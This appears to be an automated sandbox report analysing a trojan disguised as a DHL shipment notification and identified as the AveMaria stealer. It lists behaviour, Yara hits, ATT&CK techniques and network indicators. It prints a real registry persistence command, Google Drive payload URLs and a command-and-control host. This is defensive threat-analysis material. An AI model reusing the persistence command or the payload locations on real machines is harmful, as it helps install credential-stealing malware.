Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"	Jump to behavior
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe	Jump to behavior

Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000F.00000000.918325198.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000F.00000000.911476901.0000000000B59000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000000.960926581.0000000000B59000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000002.5653330376.0000000000B59000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\ProgramData\images.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: DHL Express shipment notification.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: images.exe PID: 8428, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Express shipment notification.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: images.exe PID: 8428, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Registry Run Keys / Startup Folder1	Process Injection412	Masquerading3	Input Capture111	Security Software Discovery421	Remote Services	Input Capture111	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Endpoint Denial of Service1
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Registry Run Keys / Startup Folder1	Modify Registry1	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Virtualization/Sandbox Evasion22	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection412	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	System Information Discovery3	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol113	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Users1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL Express shipment notification.exe	25%	Virustotal		Browse
DHL Express shipment notification.exe	11%	ReversingLabs	Win32.Trojan.Shelsy

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\images.exe	25%	Virustotal		Browse
C:\ProgramData\images.exe	11%	ReversingLabs	Win32.Trojan.Shelsy

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.0.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.0.DHL Express shipment notification.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
29.0.images.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
29.0.images.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.3.DHL Express shipment notification.exe.1a02148.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
39.2.cmd.exe.4f80000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.0.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.0.DHL Express shipment notification.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.0.DHL Express shipment notification.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
5.2.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
21.0.images.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
21.2.images.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
29.0.images.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.3.DHL Express shipment notification.exe.1a02148.4.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
29.0.images.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1140082	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	0%	Virustotal		Browse
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
docs.google.com	142.250.186.78	true	false	high
A2Q.my.to	194.85.248.156	true	false	high
drive.google.com	142.250.185.206	true	false	high
googlehosted.l.googleusercontent.com	216.58.212.161	true	false	high
doc-10-6k-docs.googleusercontent.com	unknown	unknown	false	high
doc-0c-74-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download	false	high
https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2	false	high
https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn	false	high
https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000F.00000000.987052343.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5702840793.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935402531.000000000D954000.00000004.00000001.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe549	DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://doc-0c-74-docs.googleusercontent.com/#9	images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://doc-0c-74-docs.googleusercontent.com/	images.exe, 0000001D.00000003.1347566980.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330644774.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	false		high
http://www.foreca.com	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000F.00000000.976658395.0000000009B50000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.926660869.000000000A7E0000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.914833980.0000000002FA0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidum	images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	false		high
https://aka.ms/odirm	explorer.exe, 0000000F.00000000.972782863.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.922114611.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5684842071.000000000950F000.00000004.00000001.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/	DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/XM	DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	false		high
http://www.google.com/support/accounts/answer/151657?hl=en	images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322042045.00000000018AA000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330432531.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	false		high
https://api.msn.com/g	explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	false		high
https://drive.google.com/	DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/%%doc-10-6k-docs.googleusercontent.com	DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	false		high
https://api.msn.com/	explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	false		high
https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleuserco	images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	false		high
https://windows.msn.com:443/shell	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://drive.google.com/(	DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeperC:	DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	docs.google.com	United States	15169	GOOGLEUS	false
142.250.185.206	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.161	unknown	United States	15169	GOOGLEUS	false
194.85.248.156	A2Q.my.to	Russian Federation	35478	DATACENTERRO	false
216.58.212.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
93.184.220.29	unknown	European Union	15133	EDGECASTUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532143
Start date:	01.12.2021
Start time:	19:21:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL Express shipment notification.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.evad.winEXE@15/2@6/6
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, IntelPTTEKRecertification.exe, BackgroundTransferHost.exe, HxTsr.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.54.122.82 Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, login.live.com, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:25:09	Task Scheduler	Run new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
19:26:26	API Interceptor	3905x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.85.248.156	Statement from QNB.exe	Get hash	malicious	Browse
93.184.220.29	kr.ps1	Get hash	malicious	Browse	/
93.184.220.29	SecuredFolder.htm	Get hash	malicious	Browse	status.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQnt%2BO7KdI35ubyUVwz39VP7XeuiQQU5wH8DBYYyn2yjOyHJ6NvYYE7hDkCEAghIHE0ISqj0Gwb1T5M8Uc%3D

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DATACENTERRO	Scan5190876.exe	Get hash	malicious	Browse	194.85.248.87
	fSK3Q4jYT1.rtf	Get hash	malicious	Browse	194.85.248.219
	PO20201120 PACKING LIST INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	194.85.248.219
	RFQ.exe	Get hash	malicious	Browse	194.85.248.250
	AOSzenmA46.exe	Get hash	malicious	Browse	194.85.248.219
	order.xlsx	Get hash	malicious	Browse	194.85.248.167
	8L9Jch9mPn.exe	Get hash	malicious	Browse	194.85.248.167
	l4CkRwSH9q.exe	Get hash	malicious	Browse	194.85.248.167
	B88hJ0hfMG.exe	Get hash	malicious	Browse	194.85.248.219
	Invoice.exe	Get hash	malicious	Browse	194.85.248.87
	Dhl_AWB5032675620,pdf.exe	Get hash	malicious	Browse	194.85.248.114
	CFfGUQZJoe.rtf	Get hash	malicious	Browse	194.85.248.219
	GlobeMed-Network-2020.docx	Get hash	malicious	Browse	194.85.248.219
	CV.exe	Get hash	malicious	Browse	194.85.248.250
	juju.exe	Get hash	malicious	Browse	194.85.248.167
	RV-PI2021-ORDERSXV488.xlsx	Get hash	malicious	Browse	194.85.248.167
	CDCB-PKG04-2573-2021 -TRANSGLOBAL.xlsx	Get hash	malicious	Browse	194.85.248.219
	NYkIPZIEzB.exe	Get hash	malicious	Browse	194.85.248.219
	1jH2FM5OI8.exe	Get hash	malicious	Browse	194.85.248.167
	mTWpnH3Cve.exe	Get hash	malicious	Browse	194.85.248.167
EDGECASTUS	mp3_Message_wav_###JBTDKV.HTM	Get hash	malicious	Browse	152.199.23.72
	ATT14851.html	Get hash	malicious	Browse	152.199.23.37
	WMHighfield.html	Get hash	malicious	Browse	152.199.21.175
	phish.htm	Get hash	malicious	Browse	152.199.21.175
